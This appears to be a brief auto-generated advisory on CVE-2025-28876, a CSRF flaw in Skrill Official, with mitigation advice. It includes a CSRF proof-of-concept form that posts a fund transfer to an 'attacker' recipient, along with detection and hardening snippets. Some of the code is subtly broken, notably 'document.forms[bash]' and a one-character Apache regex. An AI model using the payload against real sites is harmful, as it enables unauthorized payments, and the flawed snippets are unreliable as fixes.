How the CVE Works:
CVE-2025-28876 is a CSRF vulnerability in Skrill Official (versions up to 1.0.65) that allows attackers to trick authenticated users into executing unintended actions. Since the application does not properly validate request origins, an attacker can craft a malicious webpage or link that forces the victim’s browser to send unauthorized requests (e.g., fund transfers or profile changes) while logged into Skrill. The lack of anti-CSRF tokens or SameSite cookie enforcement enables this exploit.
DailyCVE Form:
Platform: Skrill Official
Version: ≤1.0.65
Vulnerability: CSRF
Severity: Medium
Date: 04/09/2025
What Undercode Say:
Analytics:
- Attack Vector: Network (exploitable via malicious links)
- Impact: Unauthorized actions (e.g., payments)
- Patch Status: Fixed in >v1.0.65
Exploit Command:
<!-- Malicious CSRF PoC (hosted on attacker site) --> <form action="https://skrill.com/transfer" method="POST"> <input type="hidden" name="amount" value="1000"> <input type="hidden" name="recipient" value="attacker"> </form> <script>document.forms[bash].submit();</script>
Protection Commands:
1. Enable CSRF Tokens (PHP Example):
session_start(); $token = bin2hex(random_bytes(32)); $_SESSION['csrf_token'] = $token;
2. SameSite Cookie Header (Apache):
Header edit Set-Cookie ^(.)$ "$1; SameSite=Strict"
Mitigation Steps:
- Update to Skrill Official >v1.0.65.
- Implement CSRF tokens in all state-changing requests.
- Configure cookies with
SameSite=Strict.
Detection (CURL Check):
curl -I https://skrill.com | grep -i "Set-Cookie" Verify "SameSite" attribute exists
Log Analysis (Failed CSRF Attempts):
grep "CSRF token mismatch" /var/log/skrill/access.log
References:
- Patchstack Advisory: [PS-2025-28876]
- OWASP CSRF Guide: https://owasp.org/www-community/attacks/csrf
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28876
Extra Source Hub:
Undercode
